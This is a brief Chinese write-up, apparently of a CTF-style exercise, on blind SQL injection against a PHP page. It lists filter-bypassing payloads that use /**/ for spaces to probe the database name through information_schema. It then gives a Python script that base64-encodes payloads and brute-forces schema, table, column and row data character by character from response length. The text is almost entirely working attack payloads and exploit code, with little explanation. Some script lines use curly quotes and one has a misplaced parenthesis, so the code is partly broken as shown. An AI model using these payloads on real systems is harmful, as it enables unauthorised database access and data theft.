记一次简单的注入

1/**/or/**/2/**/</**/3

1/**/or/**/length(database())/**/>/**/6 五张图
1/**/or/**/length(database())/**/>/**/7 一张图

1/**/or/**/substr(database(),1,1)/**/regexp/**/"a"

1/**/or/**/substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/"dropsec"/**/limit/**/1,1),1,1)/**/regexp/**/"a"

import base64
import requests

def sql_inject(id_string):
    base_url = "http://xxxxx:9174/index.php?id="
    id_string_base64 = base64.b64encode(id_string.encode("utf-8"))
    inject_url = base_url + id_string_base64.decode("utf-8")
    response = requests.get(inject_url)
    return response.text

for num in range(1,50):
    for i in "abcdefghijklmnopqrstuvwxyz_1234567890":
        response = sql_inject(‘1/**/or/**/substr((select/**/schema_name/**/from/**/information_schema.schemata),1,1/**/regexp/**/"{}"‘.format(i))
        # response = sql_inject(‘1/**/or/**/substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/"dropsec"/**/limit/**/-1,1),%d,1)/**/regexp/**/"%s"‘ % (num,i))
        # response = sql_inject(‘1/**/or/**/substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"applicable_roles"/**/limit/**/1,1),{},1)/**/regexp/**/"{}"‘.format(num,i))
        # response = sql_inject(‘1/**/or/**/substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"pics"/**/limit/**/2,1),%d,1)/**/regexp/**/"%s"‘ % (num,i))
        # response = sql_inject(‘1/**/or/**/substr((select/**/id/**/from/**/dropsec.pics/**/limit/**/1,1),%d,1)/**/regexp/**/"%s"‘ % (num,i))
        # print(len(response),i)
        if len(response) == 756:
            print(i,end="")
            break